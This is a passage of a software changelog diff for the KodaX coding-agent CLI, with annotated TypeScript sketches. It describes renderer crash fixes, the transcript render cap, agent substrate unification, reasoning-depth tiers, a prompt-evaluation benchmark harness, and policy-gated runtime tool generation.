buried under hundreds of historical rounds (mirrors CC's Messages.tsx:276). Note: claude-code's `VirtualMessageList` requires fullscreen `scrollRef` which is unavailable on Windows-SSH (FEATURE_096 auto-downgrades to main-screen) — so this cap-based fix is the correct mechanism for the affected environment, not a virtualization port. 
+   10 new tests in `transcript-layout.test.ts` pin the anchor algorithm: under cap / at cap / at cap+step boundary / past cap+step advancement / append-within-step stability / id-vanish-with-list-over-cap fallback / id-vanish-with-list-under-cap returns 0 / shrunk-list clamp / empty list clears anchor / constant values match CC parity.
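A minimal sketch of the UUID-anchored cap described for FEATURE_060 Tier 2. The constant values come from the changelog; the `CapAnchor` / `CapResult` shapes and the function body are assumptions made for illustration, not the code in `transcript-layout.ts`.

```typescript
// Sketch only: constants are from the changelog, everything else is assumed.
const TRANSCRIPT_RENDER_CAP = 200;
const TRANSCRIPT_RENDER_CAP_STEP = 50;

interface CapAnchor {
  id: string;  // id of the first rendered item
  idx: number; // index it had when stored (fallback only)
}

interface CapResult {
  start: number;
  anchor: CapAnchor | null;
}

export function computeTranscriptCapStart(
  ids: readonly string[],
  prev: CapAnchor | null,
  cap: number = TRANSCRIPT_RENDER_CAP,
  step: number = TRANSCRIPT_RENDER_CAP_STEP,
): CapResult {
  // An empty list clears the anchor.
  if (ids.length === 0) return { start: 0, anchor: null };

  let start = 0;
  if (prev !== null) {
    const found = ids.indexOf(prev.id);
    // Prefer the id; if it vanished, clamp the stored index against length - cap.
    start = found >= 0 ? found : Math.max(0, Math.min(prev.idx, ids.length - cap));
  }

  // Advance only once the window outgrows cap + step, so appends inside a
  // step leave the slice start (and the already-painted block) untouched.
  if (ids.length - start > cap + step) start = ids.length - cap;

  return { start, anchor: { id: ids[start] as string, idx: start } };
}
```

Anchoring on the id rather than the index is what keeps the slice stable when earlier items are regrouped; the index is consulted only when the id can no longer be found.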
484
+
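The FEATURE_096 host detection and the `KODAX_FULLSCREEN` override described in this list could be sketched roughly as follows. The `HostProbe` shape, the `decideRenderHost` name, and the simplification that every non-downgraded host gets fullscreen are assumptions; the xterm.js check itself is passed in as a boolean because the changelog does not say how it is performed.

```typescript
type Env = Readonly<Record<string, string | undefined>>;

interface HostProbe {
  platform: string;       // e.g. "win32"
  env: Env;               // environment variables, injected for testability
  isXtermJs: boolean;     // outcome of the xterm.js check (detection not shown)
  underlyingHost: string; // classification used when no downgrade applies
}

interface RenderDecision {
  host: string;
  fullscreen: boolean;
}

function isSet(env: Env, key: string): boolean {
  const value = env[key];
  return value !== undefined && value !== "";
}

export function decideRenderHost(probe: HostProbe): RenderDecision {
  const override = probe.env["KODAX_FULLSCREEN"]; // "1", "0", or unset
  const overSsh =
    isSet(probe.env, "SSH_CONNECTION") ||
    isSet(probe.env, "SSH_CLIENT") ||
    isSet(probe.env, "SSH_TTY");
  const windowsSsh = probe.platform === "win32" && overSsh;

  let host = probe.underlyingHost;
  if (probe.isXtermJs) {
    host = "xtermjs"; // checked first, so it is never downgraded
  } else if (windowsSsh && override !== "1") {
    host = "remote_conpty_host"; // =1 short-circuits this branch
  }

  // =0 forces main-screen on every host.
  if (override === "0") return { host, fullscreen: false };
  // Assumption: all other hosts are treated as fullscreen-capable here.
  return { host, fullscreen: host !== "remote_conpty_host" };
}
```

Passing `platform` and `env` in as data keeps the decision a pure function, which makes each of the three override states easy to pin in a unit test.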
485
+ ### Fixed
486
+
487
+ - **`outputToScreen` row-overflow crash** (commit `1b03275`, P0 hotfix): production crash on idle SSH session — `RangeError: setCellAt out of bounds: (148, 6) on 148x15` at `output-to-screen.ts:200` → `core/internals/renderer.js:63` → `core/engine.js:358`. Root cause: `Output.getGrid()` does NOT clamp writes to `width`. A write operation whose text extends past the right edge causes the row array to grow longer than `width` (JavaScript silently extends arrays via index assignment). The legacy `Output.get()` path tolerated this via `filter(undefined).trimEnd()` — overflow cells were dropped during string serialization. The new cell-renderer adapter `outputToScreen` iterated `row.length` instead of `width` and called `setCellAt(width, y, ...)`, which throws by design ("surface bugs early") and crashed the process. Phase 6 (this release) made the cell renderer the sole render path, so any overflow now hits this throw instead of being silently clipped. SSH sessions trip it more easily because terminal-width / Yoga-computed content-width disagreements expose the boundary cell. Fix at the adapter boundary (not at `setCellAt` — the throw is correct for grid-internal bugs): clamp the loop to `Math.min(row.length, width)` on x and `Math.min(grid.length, height)` on y. Two regression tests pin the invariant: a real `Output.write` with text longer than `width`, and a synthetic grid with `row.length > width`.
488
+
489
+ - **`engine.js setCursorPosition` defensive coordinate clamp** (commit `89c7dbb`): the setter previously stored the position verbatim into `this.cursorPosition`. Today nothing reads that field downstream (cell renderer derives cursor from `frame.cursor` instead), so an out-of-bounds value was harmless — but the comment explicitly anticipated future renderer-level IME wiring re-applying it. If that future caller routed the value through `setCellAt`, an out-of-bounds (x, y) would hit the deliberate `RangeError: setCellAt out of bounds` and crash the process (same class as the `1b03275` crash). Clamp at the storage boundary: `(x, y)` is clamped to `[0, columns-1] × [0, rows-1]`, undefined passes through, and a zero-dim terminal (mid-resize edge case) drops to undefined rather than storing a guaranteed-broken coordinate. Test: `engine.test.ts` "setCursorPosition clamps...".
490
+
491
+ - **`packages/repl/vitest.config.ts` workspace alias parity** (commit `6a01995`): running `npx vitest run` from `packages/repl/` failed at collection time on 18 test files with `Failed to resolve entry for package "@kodax/ai"` (and `@kodax/core`, `@kodax/mcp`, `@kodax/repointel-protocol`, `@kodax/session-lineage`). Root cause: when vitest is invoked from a sub-package directory it loads THAT package's `vitest.config.ts`, not the root one. The repl config aliased only 3 of 9 workspace packages — for everything else, vitest fell back to npm-workspace symlink resolution into `node_modules/@kodax/<pkg>/package.json`, whose `main` points to `dist/index.js`, which is absent without an explicit `tsc -b` build. Test files that don't directly import these packages still fail because `@kodax/coding`'s source pulls in `@kodax/ai` / `@kodax/core` / `@kodax/mcp` / `@kodax/repointel-protocol` / `@kodax/session-lineage` transitively, and the alias-resolved source path means vitest walks the full module graph through TS source. Fix: add aliases for every workspace package to both vitest configs (repl now aliases all 9 packages to their `src/index.ts`; root gains the 4 it was missing for parity). 18 failed files → 0 (121/121 pass, 959/959 tests in `packages/repl`; 372/373 + 1 pre-existing Windows timing flake at root). Documented the rationale + transitive-deps gotcha inline so the next contributor adding a workspace package registers an alias here.
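The `outputToScreen` row-overflow fix above comes down to clamping the adapter's loops to the target grid. The sketch below illustrates that idea; `CellGridSketch` and `outputToScreenSketch` are hypothetical stand-ins, not the real `output-to-screen.ts` code.

```typescript
// Hypothetical fixed-size grid whose setter throws on out-of-bounds writes.
class CellGridSketch {
  private readonly cells: string[];

  constructor(readonly width: number, readonly height: number) {
    this.cells = new Array<string>(width * height).fill(" ");
  }

  setCellAt(x: number, y: number, ch: string): void {
    if (x < 0 || y < 0 || x >= this.width || y >= this.height) {
      throw new RangeError(
        `setCellAt out of bounds: (${x}, ${y}) on ${this.width}x${this.height}`,
      );
    }
    this.cells[y * this.width + x] = ch;
  }

  rowText(y: number): string {
    return this.cells.slice(y * this.width, (y + 1) * this.width).join("");
  }
}

// The source grid may have rows longer than `width` (or more rows than
// `height`), so both loops are clamped before any cell is written.
export function outputToScreenSketch(
  grid: ReadonlyArray<ReadonlyArray<string | undefined>>,
  width: number,
  height: number,
): CellGridSketch {
  const target = new CellGridSketch(width, height);
  const rows = Math.min(grid.length, height);
  for (let y = 0; y < rows; y++) {
    const row = grid[y] ?? [];
    const cols = Math.min(row.length, width);
    for (let x = 0; x < cols; x++) {
      const ch = row[x];
      if (ch !== undefined) target.setCellAt(x, y, ch);
    }
  }
  return target;
}
```

The setter keeps throwing for genuine grid-internal bugs; only the adapter boundary, where over-long rows are expected, tolerates overflow.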
492
+
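The `setCursorPosition` clamp from the list above can be illustrated with a small pure function. The `CursorPoint` type and the function name are assumptions; only the clamping rules are taken from the changelog entry.

```typescript
interface CursorPoint {
  x: number;
  y: number;
}

// Clamp to [0, columns-1] x [0, rows-1]; undefined passes through, and a
// zero-dimension terminal yields undefined rather than a broken coordinate.
export function clampCursorPosition(
  pos: CursorPoint | undefined,
  columns: number,
  rows: number,
): CursorPoint | undefined {
  if (pos === undefined) return undefined;
  if (columns <= 0 || rows <= 0) return undefined;
  return {
    x: Math.min(Math.max(pos.x, 0), columns - 1),
    y: Math.min(Math.max(pos.y, 0), rows - 1),
  };
}
```

For the coordinates from the crash report, `clampCursorPosition({ x: 148, y: 6 }, 148, 15)` stores column 147 instead of the out-of-range 148.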
493
+ ---
494
+
495
+ ## [0.7.29] - 2026-04-27
496
+
497
+ ### Theme
498
+
499
+ SA / AMA substrate unification (Option Y deletion) + role-aware reasoning + prompt-eval foundation. KodaX's two top-level execution paths — `runKodaX` (single-agent) and `runManagedTaskViaRunner` (multi-agent Scout/Generator/Planner/Evaluator) — collapse onto a single declaration-borne substrate executor; legacy `agent.ts` shrinks from ~3000 lines to a 49-line `Runner.run` shim. Reasoning depth becomes a 5-tier resolution chain (user ceiling → agent default → Scout hint → Evaluator-revise escalate → user-followup escalate) replacing the flat single-mode model. New top-level `benchmark/` folder formalizes the prompt-evaluation discipline: any prompt content change must include a quality-only multi-run benchmark with persisted REPORT.md and per-category judge decomposition. Folder convention separates version-tracked artefacts (docs, datasets, harness code) from non-tracked run results.
500
+
501
+ ### Added
502
+
503
+ - **FEATURE_100 — SA Runner Frame Adoption & Capability Unification**: Single-agent (`runKodaX`) and adaptive-multi-agent (`runManagedTaskViaRunner`) paths now share one substrate. Per ADR-020, the legacy "Option Y" facade (preset dispatcher registry that wrapped `runKodaX` so `Runner.run(defaultCodingAgent, …)` *appeared* SDK-native while the body stayed on the legacy path) is deleted: the substrate executor is attached directly to the Agent declaration via `Agent.substrateExecutor`, and `Runner.run` consults that field before any registry lookup. `agent.ts` collapses from a ~3000-line implementation to a 49-line shim that just calls `Runner.run(createDefaultCodingAgent(), prompt, { presetOptions: options })`; the old body is relocated to `agent-runtime/run-substrate.ts:runSubstrate` and exposed as the canonical executor closure. Five rounds of P3 sharding (P3.6g through P3.6v) extract per-CAP helpers, activate ~50 previously-stub `it.todo` contract tests, and drive AMA-shared CAP coverage from 3/13 → 17/17 (every Class-A capability now provably runs identically on both topologies). Closes the substrate drift FEATURE_080 (v0.7.23) deferred when "Option Y" originally landed.
504
+ - **FEATURE_078 — Role-Aware Reasoning Profiles (4-tier L1-L4 chain)**: `--reasoning <off|auto|quick|balanced|deep>` semantics shift from "all roles use this mode" to "ceiling + bias for default". Resolution chain: L1 user ceiling → L2 Agent declaration `reasoning` profile (default + max + escalateOnRevise) → L3 Scout `downstream_reasoning_hint` → L4 Evaluator-revise dynamic escalation (clamped by L1). New public API in `packages/coding/src/reasoning.ts`: `compareReasoningModes` / `clampReasoningMode` / `resolveRoleReasoning(role, userCeiling, profile?, scoutHint?)` / `escalateThinkingDepth(depth, ceiling?)`. Backward-compat preserved: when no Agent profile and no scout hint are supplied, the resolver collapses to the pre-FEATURE_078 single-mode answer. SA path gains an L2 anchor via `DEFAULT_CODING_REASONING_PROFILE` on `createDefaultCodingAgent`, restoring ADR-003 alignment (SA must have a role anchor). `--reasoningCeiling` accepted as a permanent alias of `--reasoningMode` (no breaking rename). 21 active unit tests pin the L1-L4 matrix.
505
+ - **FEATURE_103 — Scout calibration + L5 user-followup escalate**: Scout's reasoning profile recalibrated `default: quick → balanced` and `max: balanced → deep` (post-FEATURE_061 Scout is no longer a classifier — it judges H0/H1/H2 cascading topology, executes H0, emits `executionObligations[]`, and emits FEATURE_078 `downstream_reasoning_hint` meta-reasoning; the v0.7.16 "quick" default was vestigial). Adds **L5** to the FEATURE_078 chain: at task-edge entry (`runKodaX` and `runManagedTaskViaRunner`), the user's prompt is scanned for *doubt* markers (`不对` / `错了` / `are you sure` / `that's wrong` / etc., requires prior-assistant-turn to fire) or *deepen* markers (`仔细` / `深入` / `think harder` / `reconsider` / etc., fires on first turn too) and the L1 ceiling auto-bumps one rank (off stays off, deep stays deep). L5 + L4 jointly close the dissatisfaction-detection surface: L4 catches *system*-detected dissatisfaction (Evaluator returns `revise`), L5 catches *user*-detected dissatisfaction. Single-rank bump (never jumps to max — multi-round dissatisfaction can step `quick → balanced → deep` across calls). 30 active unit tests cover doubt + deepen dictionaries, escalation invariants, off-kill-switch, and identity-preserving option transform.
506
+ - **FEATURE_104 — Prompt-Eval Harness Module + Quantitative Benchmark + benchmark/ folder convention**: New top-level `benchmark/` directory formalizes prompt-evaluation discipline. Convention is split: `benchmark/README.md` + `benchmark/datasets/` (test cases + golden inputs) + `benchmark/harness/` (code modules) are **version-tracked**; `benchmark/results/` (run outputs, persisted as `<ISO-timestamp>/{results.json, REPORT.md, codes/, codes-index.json}`) is **NOT version-tracked** (`.gitignore` retains nothing — committing a snapshot is opt-in for regression baselines). The 8 user-supplied coding-plan provider/model short aliases land in `benchmark/harness/aliases.ts` (`zhipu/glm51` / `kimi` / `mimo/v25{,pro}` / `mmx/m27` / `ark/glm51` / `ds/v4{pro,flash}`) with `resolveAlias` + `availableAliases` helpers (skip when API key absent). Reusable judges (`mustContainAll/Any` / `mustNotContain` / `mustMatch/NotMatch` / `lengthWithin` / `parseAndAssert` / `runJudges`) carry a `JudgeCategory` (`format` / `correctness` / `style` / `safety` / `custom`) so reports decompose quality. Three usage patterns documented: `runOneShot` (single probe), `runABComparison` (lightweight pass/fail matrix), `runBenchmark` (decision-grade multi-run with variance + persisted markdown REPORT.md across 9 sections — run summary, methodology, score matrix, sub-dimensions, latency observed, variance, ranking, **assertion failure patterns sorted by frequency**, reproduction). KodaX-specific deviation from the LiveCanvas recipe: **quality is the only ranking metric** — coding-agent users tolerate near-arbitrary latency for a correct answer, so combining quality + speed into a composite would reward fast-wrong over slow-correct (latency tracked for diagnostics but never scored). 
+   41 zero-LLM self-tests run in default `npm test` (no API cost) and pin alias verbatim shape, judge category aggregation, REPORT.md rendering, persistence round-trip, and the negative-space invariant that the harness module **does not** export `speedScore` / `DEFAULT_SPEED_*` / `DEFAULT_COMPOSITE_WEIGHTS`. Convention written into `docs/CLAUDE.md` so future contributors must include a benchmark when touching `system-prompt-*.ts` / `role-prompt.ts` / tool descriptions / `DEFAULT_CODING_INSTRUCTIONS` / protocol-emitter prompts; reasoning-depth-only changes (FEATURE_078 / 103) explicitly excluded.
507
+ - **CAP contract test suite — 100 files in `__contract-tests__/` activated**: ~50 previously-stub `it.todo` blocks across CAP-001 through CAP-098 activated as part of FEATURE_100 P3 sharding. Each CAP file now includes risk metadata, time-ordering constraints, and STATUS markers ("ACTIVE since FEATURE_100 P3.6X"). Active assertions cover SA + AMA topologies identically — the same substrate executor is asked the same question on both surfaces and must answer the same way. Reverse-audit grep gates (`legacy parity restore` / `inadvertently dropped` / `inadvertently lost` / `preserves SA semantic`) all read **0** at end of release: a regression detection net for any future drift between the two surfaces.
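The reasoning chain from FEATURE_078 and FEATURE_103 in this list can be sketched as below. Function names partly mirror the changelog, but the signatures are simplified (no `role` argument), the `auto` mode is left out because its rank is not stated, and the marker arrays contain only the examples quoted in the entry; treat all of it as an illustration.

```typescript
type Mode = "off" | "quick" | "balanced" | "deep"; // "auto" omitted in this sketch
const ORDER: readonly Mode[] = ["off", "quick", "balanced", "deep"];

export function compareReasoningModes(a: Mode, b: Mode): number {
  return ORDER.indexOf(a) - ORDER.indexOf(b);
}

export function clampReasoningMode(mode: Mode, ceiling: Mode): Mode {
  return compareReasoningModes(mode, ceiling) > 0 ? ceiling : mode;
}

interface ReasoningProfile {
  default: Mode;
  max: Mode;
  escalateOnRevise: boolean;
}

// L1 user ceiling, L2 agent profile, L3 Scout hint.
export function resolveReasoningSketch(
  userCeiling: Mode,
  profile?: ReasoningProfile,
  scoutHint?: Mode,
): Mode {
  let mode: Mode = scoutHint ?? profile?.default ?? userCeiling;
  if (profile !== undefined) mode = clampReasoningMode(mode, profile.max);
  return clampReasoningMode(mode, userCeiling);
}

// One rank up; "off" stays off and "deep" stays deep.
function oneRankUp(mode: Mode): Mode {
  if (mode === "off") return "off";
  const next = ORDER[Math.min(ORDER.indexOf(mode) + 1, ORDER.length - 1)];
  return next ?? mode;
}

// L4: Evaluator-revise escalation, clamped by the L1 ceiling.
export function escalateOnReviseSketch(
  current: Mode,
  profile: ReasoningProfile,
  userCeiling: Mode,
): Mode {
  if (!profile.escalateOnRevise) return current;
  return clampReasoningMode(oneRankUp(current), userCeiling);
}

// L5: subset of the markers quoted in the changelog entry.
const DOUBT_MARKERS = ["不对", "错了", "are you sure", "that's wrong"];
const DEEPEN_MARKERS = ["仔细", "深入", "think harder", "reconsider"];

export function bumpCeilingOnFollowup(
  ceiling: Mode,
  prompt: string,
  hasPriorAssistantTurn: boolean,
): Mode {
  const text = prompt.toLowerCase();
  const doubt = hasPriorAssistantTurn && DOUBT_MARKERS.some((m) => text.includes(m));
  const deepen = DEEPEN_MARKERS.some((m) => text.includes(m));
  return doubt || deepen ? oneRankUp(ceiling) : ceiling;
}
```

With no profile and no hint, `resolveReasoningSketch` returns the user's mode unchanged, which is the backward-compatible collapse the entry describes.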
508
+
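As an illustration of the category-carrying judges described for FEATURE_104, here is a small sketch. The judge names come from the changelog, but their signatures, the default categories, and the shape returned by `runJudges` are assumptions rather than the harness module's actual API.

```typescript
type JudgeCategory = "format" | "correctness" | "style" | "safety" | "custom";

interface JudgeResult {
  name: string;
  category: JudgeCategory;
  passed: boolean;
}

type Judge = (output: string) => JudgeResult;

export function mustContainAll(
  needles: readonly string[],
  category: JudgeCategory = "correctness",
): Judge {
  return (output) => ({
    name: `mustContainAll(${needles.join(", ")})`,
    category,
    passed: needles.every((n) => output.includes(n)),
  });
}

export function mustNotContain(needle: string, category: JudgeCategory = "safety"): Judge {
  return (output) => ({
    name: `mustNotContain(${needle})`,
    category,
    passed: !output.includes(needle),
  });
}

export function lengthWithin(min: number, max: number, category: JudgeCategory = "format"): Judge {
  return (output) => ({
    name: `lengthWithin(${min}, ${max})`,
    category,
    passed: output.length >= min && output.length <= max,
  });
}

interface CategoryTally {
  passed: number;
  total: number;
}

// Quality is the only aggregate: no latency or speed term enters the score.
export function runJudges(output: string, judges: readonly Judge[]) {
  const results = judges.map((judge) => judge(output));
  const byCategory = new Map<JudgeCategory, CategoryTally>();
  for (const r of results) {
    const tally = byCategory.get(r.category) ?? { passed: 0, total: 0 };
    byCategory.set(r.category, {
      passed: tally.passed + (r.passed ? 1 : 0),
      total: tally.total + 1,
    });
  }
  const passedCount = results.filter((r) => r.passed).length;
  const quality = results.length === 0 ? 0 : passedCount / results.length;
  return { results, byCategory, quality };
}
```

Tagging each judge with a category is what lets a report break a single quality number down into format, correctness, style, and safety components.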
509
+ ### Changed
510
+
511
+ - **`agent.ts` reduced from ~3000 lines to 49 lines** (FEATURE_100 P3.6r relocation): all reasoning + tool-loop + provider-payload + microcompact + middleware orchestration + cost tracking + extension events + provider-policy gate logic moved verbatim to `agent-runtime/run-substrate.ts:runSubstrate`. The legacy file is now a thin SDK wrapper: takes `(KodaXOptions, prompt)`, calls `Runner.run<KodaXResult>(createDefaultCodingAgent(), prompt, { presetOptions, abortSignal })`, asserts the substrate lifted `KodaXResult` onto `RunResult.data`, returns it. Behavioral parity verified by golden-trace replay across the contract-test suite. Re-exports for `buildAutoRepoIntelligenceContext`, `estimateProviderPayloadBytes`, `cleanupIncompleteToolCalls`, `saveSessionSnapshot`, etc. preserved so external callers see no API change.
512
+ - **Default coding agent declaration carries `substrateExecutor` + `middleware[]` + `reasoning` profile**: `createDefaultCodingAgent({...overrides})` now returns an Agent with three pre-populated declaration fields: `substrateExecutor` (the codingSubstrate closure that wraps `runSubstrate` and lifts the full `KodaXResult` onto `RunResult.data`), `middleware: DEFAULT_CODING_MIDDLEWARE` (autoReroute + mutationReflection + preAnswerJudge + postToolJudge, all enabled by default; the substrate body honors the `enabled` flag when consulting the declaration), and `reasoning: DEFAULT_CODING_REASONING_PROFILE` (`{ default: 'balanced', max: 'deep', escalateOnRevise: true }`, matching the AMA Generator/Planner profile). Replaces the FEATURE_080 / v0.7.23 "Option Y" `registerPresetDispatcher` indirection: there is now a single canonical hook for the coding pipeline.
513
+ - **AMA Scout default reasoning raised to balanced/deep envelope** (FEATURE_103 calibration): Scout was `{ default: 'quick', max: 'balanced', escalateOnRevise: false }` — sized for the v0.7.16 classifier era. Now `{ default: 'balanced', max: 'deep', escalateOnRevise: false }`. `escalateOnRevise` stays false (Scout has no revise loop — emits `emit_scout_verdict` exactly once and hands off to Generator or Planner).
514
+ - **`KodaXOptions.reasoningMode` accepts `--reasoningCeiling` as alias** (FEATURE_078): both names parsed identically by `loadConfig`. No breaking rename — old configs and scripts continue to work; the new alias makes the L1 ceiling semantic explicit at the CLI surface for users who care.
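The dispatch order described above, where `Runner.run` consults the declaration's `substrateExecutor` before any registry lookup, might look roughly like this. The types and the `RunnerSketch` class are hypothetical, and the sketch is synchronous for brevity, whereas the real runner is presumably asynchronous.

```typescript
interface RunResult<T> {
  data: T;
}

type Executor<T> = (prompt: string) => RunResult<T>;

interface AgentDecl<T> {
  readonly name: string;
  readonly substrateExecutor?: Executor<T>;
}

export class RunnerSketch<T> {
  private readonly registry = new Map<string, Executor<T>>();

  register(name: string, executor: Executor<T>): void {
    this.registry.set(name, executor);
  }

  run(agent: AgentDecl<T>, prompt: string): RunResult<T> {
    // The declaration-borne executor wins; the registry is only a fallback.
    const executor = agent.substrateExecutor ?? this.registry.get(agent.name);
    if (executor === undefined) {
      throw new Error(`no executor available for agent "${agent.name}"`);
    }
    return executor(prompt);
  }
}

// Analogue of the thin shim: build the default agent, run it, unwrap data.
export function runShimSketch(runner: RunnerSketch<string>, prompt: string): string {
  const agent: AgentDecl<string> = {
    name: "default-coding",
    substrateExecutor: (p) => ({ data: `substrate:${p}` }),
  };
  return runner.run(agent, prompt).data;
}
```

Because the executor travels with the declaration, a caller that holds an agent object needs no global registration step before running it.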
515
+
516
+ ### Fixed
517
+
518
+ - **DefaultCodingAgent's `instructions` no longer empty / no longer overridable**: `createDefaultCodingAgent` enforces `Partial<Omit<Agent, 'name' | 'instructions'>>` so callers cannot accidentally null out the instructions string the substrate body relies on. CAP-094 contract test (CAP-DEFAULT-AGENT-001a / 001b / 001c / 001d / 002 / 002b / 002c) pins this — frozen Agent + non-empty instructions + presence of `substrateExecutor` + `middleware[]` + `reasoning` + override-preservation invariants.
519
+ - **Reverse-audit grep gates: legacy parity comments cleared (FEATURE_100 P4)**: 13 `// legacy parity restore` comments scattered across `runner-driven.ts` (added in v0.7.26 as AMA was retrofitted to call `runKodaX`-style behavior) all removed in P4 cleanup. The reverse-audit grep gates that fail-CI on `legacy parity restore` / `inadvertently dropped` / `inadvertently lost` / `preserves SA semantic` substrings all read 0 hits at release.
520
+ - **Stale CLI / core / prompts test expectations refreshed** (commit `5f7050e`): test fixtures that drifted off the post-P3 substrate behavior updated to match — covers prompts golden snapshots, CLI argument-parsing expectations, and cross-package import shapes.
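The override constraint from the first fix in this list, `Partial<Omit<Agent, 'name' | 'instructions'>>`, can be illustrated as follows. The `AgentSketch` fields, the placeholder instructions string, and the factory body are assumptions; only the type expression is taken from the changelog.

```typescript
interface ReasoningProfileSketch {
  default: string;
  max: string;
  escalateOnRevise: boolean;
}

interface AgentSketch {
  readonly name: string;
  readonly instructions: string;
  readonly tools: readonly string[];
  readonly reasoning: ReasoningProfileSketch;
}

// Callers may override anything except `name` and `instructions`.
type AgentOverrides = Partial<Omit<AgentSketch, "name" | "instructions">>;

export function createDefaultCodingAgentSketch(
  overrides: AgentOverrides = {},
): Readonly<AgentSketch> {
  return Object.freeze({
    tools: [],
    reasoning: { default: "balanced", max: "deep", escalateOnRevise: true },
    // Overrides are spread before the protected fields, so even an untyped
    // caller that smuggles in `instructions` cannot blank them out.
    ...overrides,
    name: "default-coding",
    instructions: "placeholder instructions for this sketch",
  });
}
```

The type rejects `createDefaultCodingAgentSketch({ instructions: "" })` at compile time, and the spread order gives the same guarantee at runtime for callers that bypass the type checker.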
521
+
522
+ ### Documentation
523
+
524
+ - **`docs/features/v0.7.29.md` design doc** — single-file design record covering FEATURE_100 (SA Runner Frame Adoption with full P1-P4 phased delivery plan, 5-layer assurance approach: capability inventory + golden trace + capability contract tests + dispatch eval baseline + reverse audit, plus 3 enhancements: known-missing-capability mining + contract-test-locks-capability-existence + reverse-audit-zero-hits) + FEATURE_078 (4-tier reasoning chain semantics + Agent declaration anchor migration) + FEATURE_103 (Scout calibration rationale + L5 design + KodaX-specific deviation from LiveCanvas recipe) + FEATURE_104 v1 + v2 (anti-pattern checklist mapping + module layout + folder version-tracking convention).
525
+ - **`docs/CLAUDE.md` adds Prompt Eval section** — explicit triggers (system-prompt-*.ts / role-prompt.ts / tool descriptions / DEFAULT_CODING_INSTRUCTIONS / protocol-emitter prompts), explicit non-triggers (FEATURE_078 / 103 reasoning-depth changes), folder layout (benchmark/{README, harness/, datasets/, results/}), and the run command (`npm run test:eval`).
526
+ - **`benchmark/README.md` convention guide** — full pattern catalog (Pattern 1 one-shot probe / Pattern 2 lightweight A/B / Pattern 3 quantitative benchmark with persistence), 6-step iteration workflow (read REPORT.md §8 → form hypothesis → edit ONE prompt section → smoke-test → full re-run → diff §3 + §8), statistical caveats baked in (n=3 default, ±10pp at this sample size, 3-point indistinguishability, latency reported but not scored).
527
+ - **`benchmark/datasets/README.md` dataset authoring guide** — directory layout convention (one folder per dataset with `case.ts` + README + optional fixtures/), what goes there vs. what doesn't.
528
+ - **`docs/features/v0.7.45.md` FEATURE_102 design doc landed** — Adaptive Multi-Provider Orchestration Runtime planned for v0.7.45 (4-phase route: telemetry/trace → review fan-out + objective arbiter → stage-level capability routing → fallback/health checks → data-driven adaptive). Provider switches happen at structured-output stage boundaries (not time boundaries) preserving prompt cache + tool-call protocol consistency. Document committed in this release; implementation is a future-version line item.
529
+ - **AGENTS.md + root CLAUDE.md consolidation**: agent-rules collapsed into a single root AGENTS.md so external contributors see the project conventions without spelunking docs/CLAUDE.md.
530
+ - **`docs/FEATURE_LIST.md`**: tracker count `101 → 103` (FEATURE_103 + FEATURE_104 added), "Current released version" pointer advanced to `v0.7.29`, FEATURE_078 / 103 / 104 / 102 narrative entries added with full design-rationale explanations.
531
+
532
+ ---
533
+
534
+ ## [0.7.28] - 2026-04-26
535
+
536
+ ### Theme
537
+
538
+ Self-construction tier 2 — KodaX builds, statically audits, and activates runtime tools that the LLM uses immediately, no deploy. Standalone binary distribution via Bun --compile. Provider catalog refresh (DeepSeek V4, MiMo, Ark, kimi-code label collapse). Thinking-mode multi-turn replay hardened across providers. Construction lifecycle policy-gate ordering closed end-to-end.
539
+
540
+ ### Added
541
+
542
+ - **FEATURE_087 + FEATURE_088 — Self-construction runtime + tool generation**: KodaX gains a four-segment lifecycle (`stage_tool` → `test_tool` → `activate_tool` → `revoke_tool`) for runtime-generated capabilities, with a Constructed-World tier living under `.kodax/constructed/<kind>s/<name>/<version>.json` that merges into the same registry as builtin tools (last-wins stack semantics). Tool generation is the first real consumer: Coding Agent emits a `ToolContent` (description + JSON Schema input + `capabilities.tools` allowlist + JS handler source string) which the runtime persists, statically audits (3 hard AST rules — no-eval / no-Function-constructor / require-handler-signature — plus optional LLM-review with `safe` / `suspicious` / `dangerous` verdicts plus Anthropic schema validation), then activates through a policy gate. Activated handlers run in-process (no V8 isolate / worker — single-user CLI threat model), receiving a `CtxProxy` that gates `ctx.tools.<name>` calls through the existing `executeTool` dispatch path so constructed handlers reuse every per-tool safety policy that ships with builtins (bash OS sandbox, write path policy, truncation, error mapping). Single-active-version per name with stack rollback when revoked. REPL surface binds an `askUser`-driven dialog policy for `'ask-user'` verdicts; non-REPL surfaces (CLI, ACP, child agents) default-reject so silent activation outside an interactive UI is impossible.
543
+ - **CLI direct dispatch + lifecycle subcommands for constructed tools**: `kodax <constructed-tool> [args...]` invokes a previously-activated constructed tool from the shell without opening the REPL — turns KodaX into an LLM-extensible CLI platform. `kodax tools list` / `kodax tools inspect <name>[@<version>]` / `kodax tools revoke <name>@<version>` cover inventory and lifecycle from the shell. Args map onto `inputSchema` via `--key=value` / `--key value` / `--flag` / single-positional → first-required-string-field, with type coercion driven by `inputSchema.properties[key].type` (string / integer / number / boolean + JSON fallback for arrays / objects). CLI bootstrap binds an `async () => 'reject'` policy so `activate` cannot succeed from this surface — direct dispatch is for *invoking* already-activated tools, not approving new ones. Reserved subcommand names (`skill`, `acp`, `completion`, `tools`) are guarded against constructed-tool name collision.
544
+ - **Standalone binary distribution via Bun `--compile`**: New `scripts/build-binary.mjs` produces self-contained executables for Windows / Linux x64+arm64 / macOS x64+arm64 under `dist/binary/<target>/` with a sidecar `builtin/` directory (skill assets that `KODAX_BUNDLED=true` resolves at runtime). Build-time defines bake `process.env.NODE_ENV='production'`, `KODAX_BUNDLED='true'`, and `KODAX_VERSION='<x.y.z>'` directly into the binary so `kodax --version` reports the source-of-truth version. Smoke-tested on win-x64: rehydrate of a pre-staged constructed tool + `kodax count_lines sample.txt` direct dispatch + `ctx.tools.read` builtin call all work end-to-end, proving `await import('file:///.../<version>.js')` ESM dynamic load functions inside a bun-compiled binary. README updated with installation guidance for the binary channel.
545
+ - **FEATURE_099 — Provider catalog refresh (DeepSeek V4 + kimi-code label collapse)**: DeepSeek V4 series wired in (`v4-flash` as the default + `v4-pro` as alternate); `kimi-code` model label collapses to a single `kimi-for-coding` (the upstream gateway routes to its own active model regardless of `model` field, so multiple labels were noise); deprecated `deepseek-chat` / `deepseek-reasoner` removed. Total provider count after this cycle: 13 (AnthropicCompat 6 + OpenAICompat 5 + CLI bridge 2).
546
